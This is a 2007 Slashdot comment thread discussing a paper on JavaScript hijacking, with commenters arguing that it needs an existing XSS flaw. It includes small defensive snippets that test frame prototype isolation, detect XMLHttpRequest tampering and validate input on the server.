    This is a paper about more efficient ways of being malicious, but they only work if you can be malicious in the first place.

    You know what? If a malicious user can insert script to be executed for another user, I already have an unacceptable problem! I really don't care if that unacceptable problem is now 10% worse than was generally realized before.

  • by Original Replica ( 908688 ) on Saturday January 06, 2007 @06:58PM (#17492598) Journal
    Damn Right! If you mix that stuff with a chlorine bleach, the fumes will put you straight in the morgue.
  • (Yawn) Death of the internet, ho hum.

    It already died. In 1996. Bob Metcalfe [wikipedia.org] said so, didn't he?
  • I'm no JS expert, but it would seem that an easy fix is simply to contextualize JS prototypes - One document/frame can't modify prototypes for another.
    • by porneL ( 674499 )
      That's the case already. I've checked Opera, Safari and (Gecko-based) Camino - all have a completely separate set of prototypes for each frame, so you can't circumvent XSS protection using prototypes.

      So it seems there's nothing to get excited about - you must have an exploitable XSS vulnerability to begin with, so it's not the end of the internet just yet.
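      One quick way to check this for yourself, run after the page has loaded (the property name is made up):

        // Create a frame, poison a built-in prototype inside it, and see
        // whether the parent page's strings are affected.
        var iframe = document.createElement("iframe");
        document.body.appendChild(iframe);
        var frameWin = iframe.contentWindow;
        frameWin.String.prototype.pwned = function () { return "hijacked"; };

        alert(typeof "test".pwned);                 // "undefined" -- parent untouched
        alert(new frameWin.String("test").pwned()); // "hijacked" -- only inside the frame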
  • by Animats ( 122034 ) on Saturday January 06, 2007 @08:24PM (#17493268) Homepage

    Nobody is explaining this right.

    JavaScript has a security policy. The security model is that 1) scripts can only talk to the site from which the script came, and 2) scripts can only alter documents from the site from which the script came. The security model is enforced only at a few points, notably the XMLHttpRequest object and at points where Javascript stores into the document object tree.

    Other than those few enforcement points, JavaScript objects in the same browser instance can communicate freely. This offers a number of potential exploits, some of which are listed in the paper.

    If the security model is tightened up, prohibiting all intercommunication between Javascript objects from different sites, "mashups" no longer work, so it's too late to tighten this up without breaking some popular sites.

    This is going to be hard to fix without breaking existing programs. Javascript has a very weak concept of what's immutable. It might work to mark functions as "dirty" if changed once loaded, then forbid "new" on "dirty" functions. That would prevent changing the base instance of a class without breaking too much else, and would fix this new vulnerability. But it wouldn't fix all potential vulnerabilities in that area. As long as multiple scripts share global variables, there's going to be potential for trouble.
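    In the same spirit, a crude sketch of what a page can already do today: capture trusted references to the built-ins it depends on before any third-party script runs, and refuse to proceed if they get swapped out later. This catches wholesale replacement, not every possible modification, and assumes a browser that exposes XMLHttpRequest.prototype:

      // Captured at load time, before untrusted script gets a chance to run.
      var trustedOpen = XMLHttpRequest.prototype.open;
      var trustedSend = XMLHttpRequest.prototype.send;

      function xhrLooksClean() {
        return XMLHttpRequest.prototype.open === trustedOpen &&
               XMLHttpRequest.prototype.send === trustedSend;
      }

      if (!xhrLooksClean()) {
        // Something rewrote the prototype after we loaded -- don't send secrets.
        throw new Error("XMLHttpRequest prototype has been tampered with");
      }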

    Maybe "https" pages should be locked down more. "Secure" pages should be single source - everything has to come from one specific domain address. No frames, no cross-site anything - one secure site per window, and no shared data with other pages whatsoever. That's a start.

  • Neuromancer (Score:4, Funny)

    by noz ( 253073 ) on Saturday January 06, 2007 @08:40PM (#17493382)
    ... a possible Web Worm that lives in the very fabric of Web 2.0 and could kill the Web as we know it.
    My deck is damaged. I must break through the ICE! Where are my Yeheyuans?
  • Doesn't include javascript.
  • I'm in the middle of writing a fairly complex application in which the UI is ajax based. The calls to the back end are all done via these ajax calls.

    At the end of the day, I verify the data I accept from the application before storing it. I don't trust anything coming from the client side. Just because it's ajax and I "think" I'm in control of the application doesn't mean that I am.

    Big deal.

    You still can't send me options as selected if the options aren't in the list I offered you -- because I check. You can't send me invalid data because I check it for validity. That's my responsibility.

    You can't get me to send you something you don't have access to, because the agents that retrieve the data are running under your authority -- not as a system admin. If you don't have access to them, the data won't exist for you.

    Again -- security happens at the back end. The front end is always to be considered hostile.
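    A tiny sketch of that kind of back-end check, written here in JavaScript purely for illustration (the option list is made up; the same logic applies in whatever language the server actually runs):

      // The options we actually offered -- anything else is rejected outright.
      var ALLOWED_OPTIONS = { "small": true, "medium": true, "large": true };

      function validateOption(submitted) {
        // hasOwnProperty guards against tricks like submitting "toString".
        return ALLOWED_OPTIONS.hasOwnProperty(submitted) ? submitted : null;
      }

      validateOption("medium");      // "medium"
      validateOption("<script>x");   // null -- it was never in the list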
